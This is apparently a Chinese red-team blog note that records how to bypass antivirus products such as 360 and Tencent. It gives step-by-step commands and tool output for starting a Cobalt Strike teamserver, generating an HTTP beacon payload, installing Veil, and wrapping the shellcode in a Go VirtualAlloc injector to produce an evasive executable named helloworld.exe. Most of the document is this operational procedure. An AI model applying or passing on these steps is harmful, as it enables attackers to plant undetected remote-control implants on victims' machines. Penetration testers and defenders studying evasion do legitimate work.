记录一次绕过杀软的过程

一、背景

在做红队渗透时，经常会遇到目标机安装了各种杀毒软件，诸如360、腾讯管家之类的。导致生成的payload总是无法利用且被杀软强制删除的事情时常发生。这个东西真的很烦人，烦死了！只能停下来去研究一下杀软的原理以及如何绕过。在此记录下来做个备忘录。

二、需要用到的工具

cobalt strike:这个是在做红队渗透时用到的一款软件，具有团队协作和生成payload的工具。主要有两个部分组成，一个是服务器端，一个是客户端，服务器端只支持Linux，客户端MacOS、Windows、Linux都支持。软件运行前提是要安装java。

相关链接：https://www.cobaltstrike.com/

Veil：这个是一款生成payload并绕过杀软的一款工具。

相关链接：https://github.com/Veil-Framework/Veil

三、免杀步骤

3.1 设置CS服务器端和客户端

在这里提醒一下，如果你的CS展开目录之后文件没有执行权限，是无法运行的，所以需要给CS目录下的文件添加执行权限。

chmod +x 文件名

运行CS服务端

(base) root@kali:~/python/cs4.0# ifconfigeth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500        inet 192.168.91.156  netmask 255.255.255.0  broadcast 192.168.91.255        inet6 fe80::20c:33ff:dfbf:dfa3  prefixlen 64  scopeid 0x20<link>        ether 00:0c:29:bf:3a:23  txqueuelen 1000  (Ethernet)        RX packets 130003  bytes 193285222 (184.3 MiB)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 81397  bytes 4399635 (4.1 MiB)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0        device interrupt 19  base 0x2000
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536        inet 127.0.0.1  netmask 255.0.0.0        inet6 ::1  prefixlen 128  scopeid 0x10<host>        loop  txqueuelen 1000  (Local Loopback)        RX packets 24  bytes 1356 (1.3 KiB)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 24  bytes 1356 (1.3 KiB)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

(base) root@kali:~/python/cs4.0# ./teamserver 192.168.91.156 123456[*] Will use existing X509 certificate and keystore (for SSL)[+] Team server is up on 50050[*] SHA256 hash of SSL cert is: [+] Listener: test started!

运行CS客户端

点击【连接】即可打开CS客户端。

3.2利用CS生成payload

监听器类型设置为http类型

选择【Choose】，生成payload保存在文件夹备用。

3.3安装veil

建议使用Kali快速安装命令

apt -y install veil/usr/share/veil/config/setup.sh --force --silent

安装过程比较慢，且需要挂代理。

安装时会自动下载安装依赖软件，安装成功后如图所示：

在veil里输入

use 1

可以看到Veil里总共有41种payload，我们输入list查看所有payload

===============================================================================                                   Veil-Evasion===============================================================================      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework=============================================================================== [*] Available Payloads:  1)  autoit/shellcode_inject/flat.py  2)  auxiliary/coldwar_wrapper.py  3)  auxiliary/macro_converter.py  4)  auxiliary/pyinstaller_wrapper.py  5)  c/meterpreter/rev_http.py  6)  c/meterpreter/rev_http_service.py  7)  c/meterpreter/rev_tcp.py  8)  c/meterpreter/rev_tcp_service.py  9)  cs/meterpreter/rev_http.py  10)  cs/meterpreter/rev_https.py  11)  cs/meterpreter/rev_tcp.py  12)  cs/shellcode_inject/base64.py  13)  cs/shellcode_inject/virtual.py  14)  go/meterpreter/rev_http.py  15)  go/meterpreter/rev_https.py  16)  go/meterpreter/rev_tcp.py  17)  go/shellcode_inject/virtual.py  18)  lua/shellcode_inject/flat.py  19)  perl/shellcode_inject/flat.py  20)  powershell/meterpreter/rev_http.py  21)  powershell/meterpreter/rev_https.py  22)  powershell/meterpreter/rev_tcp.py  23)  powershell/shellcode_inject/psexec_virtual.py  24)  powershell/shellcode_inject/virtual.py  25)  python/meterpreter/bind_tcp.py  26)  python/meterpreter/rev_http.py  27)  python/meterpreter/rev_https.py  28)  python/meterpreter/rev_tcp.py  29)  python/shellcode_inject/aes_encrypt.py  30)  python/shellcode_inject/arc_encrypt.py  31)  python/shellcode_inject/base64_substitution.py  32)  python/shellcode_inject/des_encrypt.py  33)  python/shellcode_inject/flat.py  34)  python/shellcode_inject/letter_substitution.py  35)  python/shellcode_inject/pidinject.py  36)  python/shellcode_inject/stallion.py  37)  ruby/meterpreter/rev_http.py  38)  ruby/meterpreter/rev_https.py  39)  ruby/meterpreter/rev_tcp.py  40)  ruby/shellcode_inject/base64.py  41)  ruby/shellcode_inject/flat.py

我们选择Go语言生成shellcode。

Veil/Evasion>: use 17===============================================================================                                   Veil-Evasion===============================================================================      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework=============================================================================== Payload Information:  Name:    Golang Flat Shellcode Injector  Language:  go  Rating:    Normal  Description:    Golang VirtualAlloc method for inline shellcode                  injectionPayload: go/shellcode_inject/virtual selected Required Options:Name              Value     Description----              -----     -----------BADMACS           FALSE     Check for VM based MAC addressesCLICKTRACK        X         Require X number of clicks before executionCOMPILE_TO_EXE    Y         Compile to an executableCURSORCHECK       FALSE     Check for mouse movementsDISKSIZE          X         Check for a minimum number of gigs for hard diskHOSTNAME          X         Optional: Required system hostnameINJECT_METHOD     Virtual   Virtual or HeapMINPROCS          X         Minimum number of running processesPROCCHECK         FALSE     Check for active VM processesPROCESSORS        X         Optional: Minimum number of processorsRAMCHECK          FALSE     Check for at least 3 gigs of RAMSLEEP             X         Optional: Sleep "Y" seconds, check if acceleratedUSERNAME          X         Optional: The required user accountUSERPROMPT        FALSE     Prompt user prior to injectionUTCCHECK          FALSE     Check if system uses UTC time Available Commands:  back          Go back to Veil-Evasion  exit          Completely exit Veil  generate      Generate the payload  options       Show the shellcode's options  set           Set shellcode option

输入【generate】

[go/shellcode_inject/virtual>>]: generate [?] Generate or supply custom shellcode?     1 - Ordnance (default)     2 - MSFVenom     3 - Custom shellcode string     4 - File with shellcode (\x41\x42..)     5 - Binary file with shellcode [>] Please enter the number of your choice: 3 [>] Please enter custom shellcode (one line, no quotes, \x00.. format):

在上面输入CS生成的Payload，设置文件名，就生成了一个免杀payload。

 [*] Using pre-generated shellcode...===============================================================================                                   Veil-Evasion===============================================================================      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework===============================================================================
 [>] Please enter the base name for output files (default is payload): helloworld.exeruntime/internal/sysruntime/internal/atomicruntimeerrorsinternal/racesync/atomicmathinternal/syscall/windows/sysdllunicode/utf16unicode/utf8synciosyscallstrconvinternal/syscall/windowsinternal/syscall/windows/registrytimereflectosfmtcommand-line-arguments===============================================================================                                   Veil-Evasion===============================================================================      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework=============================================================================== [*] Language: go [*] Payload Module: go/shellcode_inject/virtual [*] Executable written to: /var/lib/veil/output/compiled/helloworld.exe.exe [*] Source code written to: /var/lib/veil/output/source/helloworld.exe.go